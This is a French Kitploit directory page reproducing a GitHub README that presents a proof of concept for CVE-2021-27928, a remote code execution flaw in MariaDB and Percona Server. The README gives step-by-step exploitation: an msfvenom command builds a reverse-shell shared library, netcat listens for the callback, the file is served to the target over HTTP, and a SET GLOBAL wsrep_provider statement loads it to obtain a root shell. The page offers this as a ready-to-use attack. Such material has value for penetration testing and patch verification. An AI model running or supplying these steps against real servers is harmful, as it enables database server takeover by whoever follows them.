Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-27928-POC — CVE-2021-27928-POC | Kitploit
Outils/GitHubGitHub/shamo0/cve-2021-27928-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeTests d'IntrusionSécurité des Bases de Données
GitHubshamo0/cve-2021-27928-poc

CVE-2021-27928-POC

CVE-2021-27928-POC

Voir le dépôt
123il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-27928 POC

Description

Un problème d'exécution de code à distance a été découvert dans MariaDB 10.2 avant 10.2.37, 10.3 avant 10.3.28, 10.4 avant 10.4.18 et 10.5 avant 10.5.9 ; Percona Server jusqu'au 2021-03-03 ; et le patch wsrep jusqu'au 2021-03-03 pour MySQL. Un chemin de recherche non fiable conduit à une injection eval, dans laquelle un utilisateur SUPER de la base de données peut exécuter des commandes OS après avoir modifié wsrep_provider et wsrep_notify_cmd. NOTE : cela n'affecte pas un produit Oracle.

POC

Créons notre payload avec Msfvenom. Pour notre payload, nous utiliserons /linux/x64/shell_reverse_tcp avec notre IP pour LHOST et le numéro de PORT pour LPORT. Nous allons également spécifier le type de fichier avec -f qui dans notre cas est elf-so. Et nous enregistrerons le fichier de sortie sous CVE-2021.27928.so avec l'option -o.

msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so

Notre payload est prêt ! Configurons netcat en écoute sur notre port spécifié.

Déplaçons notre fichier vers la machine cible. Pour cela, nous pouvons utiliser n'importe quelle méthode que nous préférons. J'utiliserai un serveur http python.

Sauvegardons le fichier dans le répertoire /tmp

Télécharger l’outil

Maintenant, nous devons nous connecter à la base de données et définir wsrep_provider sur notre payload téléchargé.

SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";

Il est temps de vérifier notre écouteur. Si nous avons réussi, nous devrions avoir obtenu un shell root sur la machine !

Bon hacking !

Références

https://www.exploit-db.com/exploits/49765

https://nvd.nist.gov/vuln/detail/CVE-2021-27928